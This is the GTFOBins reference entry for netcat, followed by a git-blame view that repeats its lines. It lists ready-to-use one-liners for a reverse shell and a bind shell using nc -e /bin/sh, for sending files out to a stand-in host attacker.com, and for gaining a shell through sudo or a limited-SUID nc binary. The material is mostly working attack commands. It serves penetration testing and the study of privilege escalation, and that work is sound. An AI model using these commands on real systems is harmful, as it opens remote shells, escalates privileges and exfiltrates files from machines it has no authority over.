GTFOBins.github.io/_gtfobins/nc.md

---
functions:
  reverse-shell:
    - description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional.
      code: |
        RHOST=attacker.com
        RPORT=12345
        nc -e /bin/sh $RHOST $RPORT
  bind-shell:
    - description: Run `nc target.com 12345` on the attacker box to connect to the shell. This only works with netcat traditional.
      code: |
        LPORT=12345
        nc -l -p $LPORT -e /bin/sh
  file-upload:
    - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
      code: |
        RHOST=attacker.com
        RPORT=12345
        LFILE=file_to_send
        nc $RHOST $RPORT < "$LFILE"
  file-download:
    - description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file.
      code: |
        LPORT=12345
        LFILE=file_to_save
        nc -l -p $LPORT > "$LFILE"
  sudo:
    - description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional.
      code: |
        RHOST=attacker.com
        RPORT=12345
        sudo nc -e /bin/sh $RHOST $RPORT
  limited-suid:
    - description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional.
      code: |
        RHOST=attacker.com
        RPORT=12345
        ./nc -e /bin/sh $RHOST $RPORT
---
First commit 2018-05-21 19:14:41 +00:00			`---`
			`functions:`
Adopt new function names 2018-10-05 17:55:38 +00:00			`reverse-shell:`
Describe which functions work with netcat traditional 2018-07-22 14:35:26 +00:00			- description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional.
Fix YAMLs according to YAMLlint 2018-07-16 13:01:50 +00:00			`code: \|`
			`RHOST=attacker.com`
			`RPORT=12345`
			`nc -e /bin/sh $RHOST $RPORT`
Adopt new function names 2018-10-05 17:55:38 +00:00			`bind-shell:`
Describe which functions work with netcat traditional 2018-07-22 14:35:26 +00:00			- description: Run `nc target.com 12345` on the attacker box to connect to the shell. This only works with netcat traditional.
Fix YAMLs according to YAMLlint 2018-07-16 13:01:50 +00:00			`code: \|`
			`LPORT=12345`
			`nc -l -p $LPORT -e /bin/sh`
Adopt new function names 2018-10-05 17:55:38 +00:00			`file-upload:`
Fix YAMLs according to YAMLlint 2018-07-16 13:01:50 +00:00			- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
			`code: \|`
			`RHOST=attacker.com`
			`RPORT=12345`
			`LFILE=file_to_send`
			`nc $RHOST $RPORT < "$LFILE"`
Adopt new function names 2018-10-05 17:55:38 +00:00			`file-download:`
Fix nc download description 2018-07-22 11:47:43 +00:00			- description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file.
Fix YAMLs according to YAMLlint 2018-07-16 13:01:50 +00:00			`code: \|`
			`LPORT=12345`
			`LFILE=file_to_save`
			`nc -l -p $LPORT > "$LFILE"`
Adopt new function names 2018-10-05 17:55:38 +00:00			`sudo:`
Describe which functions work with netcat traditional 2018-07-22 14:35:26 +00:00			- description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional.
Add suid-limited and sudo-enabled to nc 2018-07-22 14:34:05 +00:00			`code: \|`
			`RHOST=attacker.com`
			`RPORT=12345`
Reorder functions in git, lua, and nc 2018-07-22 14:42:43 +00:00			`sudo nc -e /bin/sh $RHOST $RPORT`
Adopt new function names 2018-10-05 17:55:38 +00:00			`limited-suid:`
Describe which functions work with netcat traditional 2018-07-22 14:35:26 +00:00			- description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional.
Add suid-limited and sudo-enabled to nc 2018-07-22 14:34:05 +00:00			`code: \|`
			`RHOST=attacker.com`
			`RPORT=12345`
Reorder functions in git, lua, and nc 2018-07-22 14:42:43 +00:00			`./nc -e /bin/sh $RHOST $RPORT`
First commit 2018-05-21 19:14:41 +00:00			`---`